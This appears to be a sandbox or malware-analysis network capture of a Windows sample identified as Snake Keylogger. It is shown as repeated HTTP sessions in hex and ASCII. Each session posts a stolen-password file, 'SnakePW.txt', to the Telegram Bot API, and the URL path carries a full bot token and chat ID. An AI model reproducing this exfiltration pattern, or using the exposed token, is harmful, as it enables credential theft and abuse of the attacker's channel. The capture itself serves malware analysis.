                                                                    2022-06-26 07:34:31 UTC442OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 64 31 64 65 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575717d1de33Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:32 UTC443INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:31 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:32 UTC443INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67046,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    263192.168.2.550183149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:32 UTC444OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757180fda9c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:32 UTC444OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 30 66 64 61 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757180fda9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:32 UTC444INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:32 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:32 UTC445INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67047,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228872,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    264192.168.2.550185149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:32 UTC445OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757184b76f0
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:32 UTC446OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 34 62 37 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757184b76f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:32 UTC446INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:32 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:32 UTC447INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67049,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228872,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    265192.168.2.550188149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:32 UTC447OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575718824b6c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:32 UTC447OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 38 32 34 62 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575718824b6cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:33 UTC448INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:33 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:33 UTC448INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67050,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228873,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    266192.168.2.550192149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:33 UTC449OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575718ed951d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:33 UTC449OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 65 64 39 35 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575718ed951dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:33 UTC450INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:33 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:33 UTC450INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67051,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228873,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    267192.168.2.550195149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:33 UTC450OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575719293048
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:33 UTC451OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 32 39 33 30 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575719293048Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:34 UTC451INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:34 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 510
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:34 UTC452INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67052,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    268192.168.2.550197149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:34 UTC452OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757196006aa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:34 UTC452OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 36 30 30 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757196006aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:34 UTC453INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:34 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:34 UTC453INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67053,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    269192.168.2.550200149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:34 UTC454OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757199ba0d3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
